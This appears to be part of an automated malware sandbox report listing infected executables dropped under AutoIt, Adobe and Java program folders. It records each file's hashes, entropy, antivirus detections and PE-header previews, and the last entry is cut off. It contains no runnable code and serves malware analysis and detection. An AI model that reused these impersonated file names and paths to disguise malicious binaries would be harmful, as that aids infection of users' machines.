                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.565058069750008
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:mfYP1JsEDkSR7Xgo4TiRPnLWvJSDmg27RnWGj:mYPBR7Xn4TiRCvJSD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:84E2702060F23E180809414DBAF12898
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A1C8C3A162F74A7AC4DE1A4BA65C654FA99ACC5A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E1D2A2350EB61A649E1B3725AB445F5830C7F5787076F9276A432DE564B4D0F8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A27B7ABD01F29ABF38144F3CEC28A49F9886EB778F77511DDF64A0592B1B2B79BC24E13F8730ECEE612A00485D218F0C6B64900BFFA41828B9C3004DD6A0663E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....u.$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.12355652474732
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:W62SYUcknn8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:rYUckn8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6CDF84AC315BBA13D224DBB4DCC9D8CD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5B8261065EC28F5205FDF289D073B90E627306DA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B5A28F699034446DF7B04DF145BBCDE71F306019671514192399B89335236A29
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:521B28BD6F82022913F66F744D32AE17AB895909441177D6CCC507F5B6175D6D10EAB8FC41BE0A1720BDBAFAC2C02CD7544CD23E008CD082FDF4A3824430CC36
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@...............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.166680568339516
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:h+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSGDmg27RnWGj:LSktbpoD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:08F095DC6399A5A3BD7A4ED3DCDD615E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BBF24D443B4F85691189A7B505C6B61E68191E2F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:62434B6F22FBF7F3988D97D76E162E04A17B696E3D07BCFDFF5C9A94743F7E97
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6940FF4A94FCE153636E89872E9A85CB87F54FC18416D0309F1844131E05497D32922DC9DD39AB8158684D0D7C05D916E8BF17C0858BAEAC3C976B7B043A4D4C
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................v.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.094635585874868
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:nGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLNDmg27RnWGj:P4OEtwiICvYMRftD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:14F831C8B8E02064775088B67B062EAE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D34759CAE191F2F795A976675ADCE3D728282FA8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D890E1689BA901360266914A8E779EC83203A976D49C3CA97BF689FD940895FF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B7DEFFD8D881AA8951DAB1424080F11EA47BDEAFCEADC49DC2715D948DA746EA9E42F6C5D430131421392769C8FB10A68692EAB134D721433EA6DEA7E2A0B8C2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.496392003574737
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:WAMuR+3kMbVjhKsqjnhMgeiCl7G0nehbGZpbD:7D+lbVjheDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:29E1F2597FAF927CB3C5EBD8C13CB170
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:AC7C444EA9CECFC446D9A739066C518CE3DC2FBD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:8D7162DEFEF0626C08BB3B9C34BB3E3ECBB2128C683FA63D9F6B09F2F6123E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6562FDEF91ACC7CEE5FBB1EDAB08406E75616950C3044B39BF560A5CC5D26D9ADAE96B35FA2AF18D16DE857D247FE04FCC2D1FD2C199DBE5E94A3B410EE250AF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................3.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.277749247988975
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:mImGUcsvZZdubv7hfl3kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcml0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E8605BD6DB860B9A641C2DDFD034DACF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D555293D02A4395F1E075A54E40EFEB26AA1037B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5ED1A32F08E86E8FFBA9C76A768760EBB60744ED955D977540AAE49E5AD73B23
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8AF0500D0C8FDFE52D9AE04859BFFC65560ECED8FA347B7CDD28BB13CB083BE2124B56A22EC60AC14FFC931B0F2CC484B9A8EA5A7EA06D99EE38950CDB1A5B21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.694803437049375
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:g0vHyeLj8trn3wsMsqjnhMgeiCl7G0nehbGZpbD:htj4rgs4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:173F030CF90169729A3FCCB54FACFAF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FBB8F75E64CF4028C2409BC9365BE33FC09F58FE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C93E07A2ED9F80CF44396C04EA0CA4BA556588A80880A6BDB926E1881A70A963
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C6DBD7286A54A437599393A5E3CF99B2C6ED4156C00AE301112EA9C7F5B00152ACA51F5642F84B7692E7EC092FEF08C9CCC6152B81A8AA4973FD65015FFFE5CF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......L.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.279664711717398
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:7oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZZsqjnhMgeiCl7G0nehbGZpv:y4i0wGJra0uAUfkVy7/ZdDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:A7A0AFAD35A4F33D1A61A2F76E1BBE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FEC852519CF370E4BF4D2848DD5D4592397E7E45
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:678653AA007CBC0145679B4922D1F8A2A63429FCE67B29F6891876B647C42E7F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A3592B5735C90D8E61F417F7A4F4922411AEAD183103820692579829EFD7F2CD22994D14C247960366542089C363572F5A3382B4E3E6971B24A66E9185AA9969
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.44876566551728
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:SeR0gB6axoCf0R6RLQRF/TzJqe58BimSsqjnhMgeiCl7G0nehbGZpbD:ugHxmR6uBTzge5MimWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1AA8A5003F44B5BEACEAFE21D1BB3F2C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F00A0BE2AF9C795A917827C97305A181B21358AE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:640B946367A8E97C3C74B7D9AEB6E665A7C1A6991AC66D5A72090353271C23B5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EBE1AA6C8A0D5011D1C65FEEF8DDEA9E8DF72230331719AB41E3B43F44567A45C9CAC837C2C02B724830FA6CC879968B1D3151A79BB292909234772AAB9644D6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......c.......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.446064863875644
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:2nEbH0j4x7R6SvyCMcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:2kwOtO7csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D5E09BBE448C15FD948E4B0DE09BB6C6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A9B891916ACE725336CFF921F84173DA5FD32B8C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3DF4E595B5D17DCE8DCF63F19126ECD8F590235107E7BF564C84CD5A60E7CA5B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8D088ABA721FCA93A23059E31BD5823B2AE7F81F00B464A8B98CFA4D9930F5BDD985C5B2DD8086CA115CD9992AAC27CF383C660E4EB7C526FD6A5BD920DBB7C2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......<.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.446820320054925
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:2nU/h/4K7sqjnhMgeiCl7G0nehbGZpbD:2U/VvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E876712E03113252FC9124D965D24BB8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D6A74B5F6CD0AC9FA404B03B87068AE6CDDDB402
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AE6E77A2F19A7DBBDF92C31A153FD8186EEA50F3CC261D6747FB5C397305E0EF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:F75377D9CE987CB628534EC3328AAAA8CE24F986D2C472FC9602BEFEBCAEE780C0DDEA8C6EF66503982B84AEDD0F919CB29EF17E3E8143DAF5D016E08638673E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......R........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4837377812122305
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:+x71iBLZ05jNTmJWEx4sqjnhMgeiCl7G0nehbGZpbD:+xhiHIjNgkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:37A1EA951361F934C20A0233B16D5295
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:CD71EDBFE22F3529E2CD34289CC8F444B8384AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:ABC23C34619251F621C22BAE4E73398B57C6ADF8E8649A260B6FC74A7CF7D77C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:18811B2B841DE4E3809DCBB03BF8B802D3461C3E8BEA3D0F45C79B871A3CFBFF30250D66D7CCD9C5B2A1C4DDCF152B6A5C22CC48521FC9FE58C6F1DD6CBF4D5A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
